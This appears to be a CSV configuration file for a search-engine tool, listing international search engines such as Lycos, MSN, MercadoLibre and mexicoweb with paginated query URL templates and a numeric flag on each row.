"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 2 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","1"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 3 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","1"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos SE 4 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","1"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos Se 5 (Next 10)","http://lycossvar.spray.se/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=slim_loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=se&wh=47&nightsurf=no&sc=blue&term=","0"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","1"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","0"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","0"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","0"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","0"
"International","Lycos TW","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}","0"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","1"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","0"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","0"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","0"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","0"
"International","Lycos TW 2 (Next 10)","http://tw.lycosasia.com/srch/index.html?query={SEARCH_KEYWORD}&offset=10&flip=","0"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","1"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos UK","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&mtemp=main&etemp=error","0"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","1"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 2 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=1&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","1"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 3 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=2&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","1"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 4 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=3&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","1"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Lycos UK 5 (Next 10)","http://search.lycos.co.uk/cgi-bin/pursuit?query={SEARCH_KEYWORD}&cat=loc&matchmode=and&pag=4&maxhits=10&lang=any&idx=all&SITE=uk&d1=1&wh=15044&nightsurf=no","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","Mamma","http://www.mamma.com/Mamma?query={SEARCH_KEYWORD}&qtype=0","0"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","1"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","0"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","0"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","0"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","0"
"International","mercadolibre","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=","0"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","1"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","0"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","0"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","0"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","0"
"International","mercadolibre 2 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=101","0"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","1"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","0"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","0"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","0"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","0"
"International","mercadolibre 3 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=201","0"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","1"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","0"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","0"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","0"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","0"
"International","mercadolibre 4 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=301","0"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","1"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","0"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","0"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","0"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","0"
"International","mercadolibre 5 (Next 100)","http://www.mercadolibre.com.mx/jm/search?as_word={SEARCH_KEYWORD}&as_pr_categ_id=&as_desde=401","0"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","1"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","0"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","0"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","0"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","0"
"International","mexicoweb","http://200.76.190.2/busca/buscador.cgi?query={SEARCH_KEYWORD}","0"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","1"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","0"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","0"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","0"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","0"
"International","mexicoweb 2 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=2","0"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","1"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","0"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","0"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","0"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","0"
"International","mexicoweb 3 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=3","0"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","1"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","0"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","0"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","0"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","0"
"International","mexicoweb 4 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=4","0"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","1"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","0"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","0"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","0"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","0"
"International","mexicoweb 5 (Next 25)","http://200.76.190.2/busca/buscador.cgi?isValidated=Yes;query={SEARCH_KEYWORD}&nh=5","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Mexonline","http://www.mexonline.com/cgi-shl/webfind.exe?indexname=mol&maxhits=all&searchin=complete+file&header=%2Fservices%2Fsearchheader.htm&footer=%2Fservices%2Fsearchfooter.htm&keywords={SEARCH_KEYWORD}","0"
"International","Moonmist","http://www.moonmist.info/search.asp?pg=q&q={SEARCH_KEYWORD}","0"
"International","Moonmist","http://www.moonmist.info/search.asp?pg=q&q={SEARCH_KEYWORD}","0"
"International","Moonmist","http://www.moonmist.info/search.asp?pg=q&q={SEARCH_KEYWORD}","0"
"International","MSN","http://search.msn.com/results.asp?q={SEARCH_KEYWORD}&co=100","1"
"International","MSN","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN","http://search.msn.com/results.asp?q={SEARCH_KEYWORD}&co=100","0"
"International","MSN","http://search.msn.com/results.asp?q={SEARCH_KEYWORD}&co=100","0"
"International","MSN","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN 2 (Next 100)","http://search.msn.com/results.asp?ba=(2.100)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=1&rd=2","1"
"International","MSN 2 (Next 100)","http://search.msn.com/results.asp?ba=(2.100)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=1&rd=2","0"
"International","MSN 2 (Next 100)","http://search.msn.com/results.asp?ba=(2.100)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=1&rd=2","0"
"International","MSN 2 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN 2 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN 2 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=51&FORM=PERE","0"
"International","MSN 3 (Next 100)","http://search.msn.com/results.asp?ba=(2.200)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=2&rd=2","1"
"International","MSN 3 (Next 100)","http://search.msn.com/results.asp?ba=(2.200)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=2&rd=2","0"
"International","MSN 3 (Next 100)","http://search.msn.com/results.asp?ba=(2.200)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=2&rd=2","0"
"International","MSN 3 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN 3 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN 3 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN 4 (Next 100)","http://search.msn.com/results.asp?ba=(2.300)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=3&rd=2","1"
"International","MSN 4 (Next 100)","http://search.msn.com/results.asp?ba=(2.300)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=3&rd=2","0"
"International","MSN 4 (Next 100)","http://search.msn.com/results.asp?ba=(2.300)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=3&rd=2","0"
"International","MSN 4 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN 4 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN 4 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN 5 (Next 100)","http://search.msn.com/results.asp?ba=(2.400)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=4&rd=2","1"
"International","MSN 5 (Next 100)","http://search.msn.com/results.asp?ba=(2.400)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=4&rd=2","0"
"International","MSN 5 (Next 100)","http://search.msn.com/results.asp?ba=(2.400)0(.)0.......&co=(0.100)4(0.1)3.200.2.5.10.3..&q={SEARCH_KEYWORD}&v=1&pn=4&rd=2","0"
"International","MSN 5 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN 5 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN 5 (Next 50)","http://search.msn.com/results.aspx?srch_type=0&q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN BR","http://search.msn.com.br/results.aspx?ps=CY%3dpt-br%26ba%3d0%26co%3d50.6.200.3.2.5.3..%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","1"
"International","MSN BR","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN BR","http://search.msn.com.br/results.aspx?q={SEARCH_KEYWORD}&first=1&FORM=PERE","0"
"International","MSN BR","http://search.msn.com.br/results.aspx?ps=CY%3dpt-br%26ba%3d0%26co%3d50.6.200.3.2.5.3..%26&q={SEARCH_KEYWORD}&ck_sc=0&ck_af=0","0"
